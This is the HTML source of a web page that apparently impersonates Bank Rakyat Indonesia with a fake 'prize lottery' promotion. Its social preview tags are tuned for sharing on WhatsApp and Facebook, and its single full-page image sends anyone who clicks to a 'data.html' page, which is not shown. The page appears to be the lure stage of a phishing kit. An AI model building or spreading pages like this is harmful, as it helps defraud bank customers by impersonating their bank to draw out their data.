
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
    <meta name="theme-color" content="#2893eb" />
    <!-- No need to change anything here -->
    <meta property="og:type" content="website" />
    <meta property="og:image:type" content="image/jpeg">
    <meta name="description" content="PT. Bank Rakyat Indonesia (Persero) Tbk.
    Gedung BRI
    Jl. Jenderal Sudirman Kav.44-46
    Jakarta 10210
    Indonesia" />
    <!-- Size of image. Any size up to 300. Anything above 300px will not work in WhatsApp -->
    <meta property="og:image:width" content="300">
    <meta property="og:image:height" content="300">
    
    <!-- Website to visit when clicked in fb or WhatsApp-->
    <meta property="og:url" content="https://l.top4top.io/p_3495yhwnf0.png">
    <meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://l.top4top.io/p_3495yhwnf0.png">
    <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://l.top4top.io/p_3495yhwnf0.png">
    
    <title>
        𝗚𝗲𝗯𝘆𝗮𝗿 𝗨𝗻𝗱𝗶𝗮𝗻 𝗕𝗲𝗿𝗵𝗮𝗱𝗶𝗮𝗵 - 𝗕𝗮𝗻𝗸 𝗕𝗿𝗶
    </title>
    <!-- Latest compiled and minified CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous">

    <link rel="stylesheet" href="css/index.css" type="text/css" media="all" />
  </head>
  <style type="text/css" media="all">
      body{
          font-weight: 500;
          background-color: #2893eb;
      }
      
      .bg{
          width: 100%;
          height: auto;
      {
  </style>
  <body>
    <main>
        <img onclick="location.href='data.html'" class="bg" src="images/kpn.png" alt="" />
    </main>
  </body>
</html>